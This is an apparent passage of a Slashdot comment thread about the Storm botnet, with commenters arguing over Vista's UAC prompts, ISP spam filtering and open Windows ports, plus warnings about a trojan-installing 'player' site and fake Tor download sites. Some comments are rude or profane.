In a roundabout way--in a way much less destructive than your "break compatability" suggestion--the "annoyance" of UAC has driven users to more secure software. It's actually an inspired piece of psychology meeting software. They tried to make users care about security. They've promoted things like running only at the PowerUser level or below, running with aggressive IE security settings, etc. But users just don't care. A computer to them is a tool and nothing more and that's that. They want to just do what they want to do. So by creating UAC prompts for bad-actors and non-secure apps, it aligns the users interest with the interest of us security-minded folks. Not brilliant, but, perhaps, inspired.

3. Only in the beatnik granola eating linux world (sorry for the stereotype) can anyone take seriously your suggestion for just breaking compatibility with every app that today throws a UAC. It's just not REALISTIC. It's not even utopian. It's an under-thought solution that suggests that there's no other way to solve the problem than to throw away BILLIONS AND BILLIONS of dollars worth of labor.

Windows is a powerful brand. But again, most users see a PC as a tool and Windows is maybe like the toolbox. A good toolbox can make your life easier. Your suggestion is to make a toolbox that none of the users existing tools will fit into. But that would cause them to just throw out that toolbox. And they'd keep using the insecure software. What Microsoft is trying to do is point out in an in-your-face way that "the tool you just picked up is not safe to use." Over time, I find it likely that they'll replace their unsafe tools. People deep down WANT to conform, they WANT to meet expectations, they WANT to be responsible. But VERY few would just be cool with throwing out all their tools and never using them and replacing them all at once because their new toolbox said the tools were unsafe and wouldn't let them use them anymore.

4. My point, for reiteration, is REALISM. We have a real problem. It's not just Microsofts problem. It's the entire software industry. Very few companies are concerned with making secure software. In all fairness, this wasn't an issue until the advent of the ubiquitous high speed internet connection, which hit critical mass no more than 7 years ago.

We have to accept that this problem exists. And we have to accept reality:

- Microsoft is not going away. Windows is not going away. Even if Microsoft never sold another copy of windows it would STILL be on hundreds of millions of computers for YEARS and YEARS to come.

- Tens--even hundreds--of billions of dollars of software exists (both in-house and commercial) that relies on Administrator privs or otherwise insecure techniques. All of this software, every last byte, has been the product of an investment. The software isn't going anywhere. Y2K shed a light on the true life expectancy of software. As any software developer will tell you -- myself included -- software is expensive. I can't tell you how many times I've given formal and off-the-cu

Re:Ha! ISPs?

[WhatAmIDoingHere]

How do you know it's spam and not a *insert lame hobby* enthusiast sending out newsletters?

You can't block the usual ports because a lot of people do their own email stuff (VERY technical term).

There's a lot of iffy stuff involved and no matter what's done a group of people will be pissed off.

Re:Ha! ISPs?

[mikkelm]

Are you suggesting that ISPs do layer 4 filtering and layer 6 inspection on all traffic on their network? Are you aware of the absurd amount of resources that would require?

Not just YouTube links.

They are hacking websites too!

Great...

[Ub3rT3Rr0R1St]

Just great! How am I supposed to kick off my anonymous online greeting card company now?! Thanks a lot Storm!

Is that the best

[Joseph_Daniel_Zukige]

defense you have for spouting thoroughly revisionist history blather?

I was there. I know how silly what you said was. No /. reader except a very few thoroughly bent M$Fanbois would take what you said seriously, and there is no hope of reaching them through reason.

You would either have to be one of said M$Fanbois or a troll.

Thus, arguing with you is irrational.

But I still have to wonder how you managed to find someone who would mod you up, thus the question.

Re:Is that the best

[BenoitRen]

Way to defeat an argument! Just label him an M$ fanboy or troll! Brilliant!

Modding myself up? ohnoes, he got points while defending win9x, he must have done it himself!

Have you thought of how silly you're being?

I actually own a Win95 box and a Win98 SE box. I have done default installations on them. They don't open ports needlessly, unlike people's precious WinXP. I'm sorry you're so anti-Microsoft that you can't accept that.

As expected: A mod-down, but still no CIS TOOL?

Modded down eh? I see this is the BEST RESPONSE you are left with?

LOL!

And, still NO RESULTS that are superior to my own @ 85.185 on a legitimate & noted multiplatform test of security best on best practices analyses on the OS platform it runs on in CIS TOOL (noted by SANS & COMPUTERWORLD, 2 often cited sources here on /., as regards security related threads here, & thus, respected ones) on your ends, from you *NIX users??

ROTFLMAO - predictable, & expected... history here thusfar, with over 40 "penguins" & other *NIX users outright RUNNING from this challenge, doesn't show anyone otherwise, now does it??

APK

P.S.=> Newsflash: "down moderation" on your parts really doesn't stand up too well, now does it, vs. concrete & verifiable results on my end.... vs. your lack of them, period! apk

Apps requiring admin privs Re:Ha!

>Did they end up just using the admin account because of loser applications that require administrative access to install
You mean like Adobe Flash Player or Yahoo Instant Messenger? (from adobe's site:
sudo ./flashplayer-installer)
They especially shouldn't need this on Unix or OS X, but they do.

We just need a few rules and a czar (Re:Ha! ISPs?)

[rhyre417]

Actually, blaming the network doesn't help much.
In the early days of the internet, there were specifications and best practices for host security.
And there were also stories about key administrators shutting down whole countries until they dealt with 'inappropriate' network behavior:
Unless you have a way to impose social control on user behavior, you need both host security and powerful administrators to impose absolute security:
Read 'Goliath at Bay' from 1996 for a 'powerful user' story http://www.discovery.org/scripts/viewDB/index.php? command=view&id=24&printerFriendly=true

Re:I had a 500% increase in Spam on Tuesday Last W

[NateTech]

ISP's are paid by the packet. Spammers make all ISP's money, either by paying them to be hosted, or by causing your bandwidth use to go up, so there's no financial incentive to remove them, permanently.

In fact, your ISP probably loves it if a spammer pushes you over a quota or forces you to buy a bigger pipe.

Only once large corporations put big pressure on their upstreams to go find out where the traffic is coming from and stop it, because they refuse to pay for spam to be delivered over their big pipes... will it ever end.

There has to be a monetary incentive to stop spam. Contact your upstream and send them a bill for your upgrade costs. Tell them they need to be actively stopping the traffic from known spam hosters.

Ludicrous? Yes. If everyone did it? Great stuff would happen. It's ALL about the money, and if spam is costing you money, you need to find a way to make that cost move upstream to the backbones.

Problem is... the backbones make as much money from the spammers as they'd lose to you. Far more, actually. So they won't respond.

You're partially right, but 95 DOES open port 139.

Windows 95 opens fewer ports by default than later versions. That much is true. However, all 32-bit versions of Windows have port 139 wide open. I have verified this myself. It is conceivable that your ISP blocks this port by default, which would skew your results, especially if you see it in "Stealth" status on grc.com.

There is a version of Windows that opens no ports by default, but it is not Windows 95.... it's Windows for Workgroups 3.11.

Re:If only they could use the botnet for the good.

[Verte]

My first thought after reading the article was, maybe it is?

the implication is perhaps more troubling. It suggests that there is a group of Russian hackers who, on their own, can disrupt the routine functioning of commerce, media, and government any time they want. If so, these hackers represent a stateless power -- a sort of private militia. But more than that, it potentially puts political power into the hands of an educated prolateriat. Is it worrying that I'd prefer my peers in Russia in control, over my own government?

We should just give up.

[symbolset]

You're right. There's no hope we can get Microsoft to make Windows secure enough for the least skilled 1% to use it without losing control of their machine to a botnet. After all, as yesterday's MOTD on slashdot said, "If you make a system simple enough an idiot can use it, only an idiot would want to."

We should just resign ourselves to the fact that there will always be 10-20 million bots under the control of anonymous evildoers because at least 1% of Windows users can't help but execute every program they can find. We should accept our DDOS'ing and our V14gr4 spam until someone comes up with an alternative plan.

Me, I'm liking the idea of an Alternet -- a vpn on IPV6 where the rest of us don't have to play this game and you can get your access suspended for sending spam or malware.

w3player 3wplayer also bittorrent tojan attempts

[theolein]

The domain play3w.com seems to be involved in the hosting of questionable software in the form of a so-called media player that installs trojans onto ones software. A cursory search on the internet reveals that there are many media files floating around the internet, some legal, some obviously not, which are supposedly encoded with a codec used by this player, called w3player or 3wplayer. The media files seem to only display a message directing one to the site download.play3w.com in order to download the software, which, upon installation throws up warning about a trojan being installed. In light of the current storm botnet growing to enormous proportions it is very likey that the site is involved in this in some way, given the wide distribution and use of bittorrent. This play3w scam seems to be widespread enough in fact, that there are other sites on the net that are also seeming to jump in on the act, such as mindcut.net (see 3wplayer link and almost everything on that site, in fact).

There is probably no better way to spread trojans and viruses these days than by way of bittorrent scams.

Please note, Tor is not associated in any way!

[shava]

We sent this notice to slashdot days ago as a story, but it wasn't apparently interesting enough to post then...

====
The Tor Project, a US non-profit organisation producing Internet
privacy software, is issuing an urgent warning about a spam email
being circulated as a fake promotion for their software.

The real Tor software provides privacy on the Internet to journalists,
bloggers and human rights activists all over the world. The spam email
promotes the virtues of the software, but then directs people to a
series of fake websites that contain malicious code that will attempt
to take over visiting machines, and the downloaded software is fake
and equally dangerous to run.

The real website is hosted at http://tor.eff.org/ and the Tor
software can be downloaded from there. Users are able to check that
they have received the official version by following the instructions
at: http://wiki.noreply.org/noreply/TheOnionRouter/Ver ifyingSignatures

Shava Nerad, Development Director for the Tor Project said, "I am
disgusted that criminals who want to recruit more machines for their
illegal activities should trade on our reputation for providing
privacy on the Internet. Fortunately we already have systems in place
so that people can verify that they are downloading the official
software. But this is a distraction from our work that we could do
without."
====

This attack does not, as reported elsewhere, download a trojaned version of Tor *or* use our network. All it (ab)uses is our reputation.

Shava Nerad
Development Director, The Tor Project

BS right back at ya

[theolein]

Vista is not getting slammed just because of the UAC nonsense (which, btw, is solved pretty well in OSX, which you might know if you had actually TRIED any alternative instead of doing the standard hurt feelings microsoftie routine that is frankly, getting fucking boring). Vista was slammed because it is a satanic resource hog, and I say that as someone who compared them side by side on the same Intel Mac machine. It was slammed because of the shoddy QA which led to network performance issues when playing sound (for god's sake, if that wasn't just a damn poor excuse for a bad coding, then I don't know what is). It got slammed for playing havoc with legacy software. It got slammed for refusing to play non certified HD content.

And last, but not least, BY FAR, is the fact that Microsoft uses Vista, and enforced Vista compatibility, and blatantly corrupt practices such as attempting to buy ISO acceptance in the OOXML debacle.

I don't care about the fact that it is Microsoft, but I am sick and tired of wankers who use or code for Windows here on slashdot crying like little babies every time their momma MS gets taken to task for overt bad practices.

Fuck off.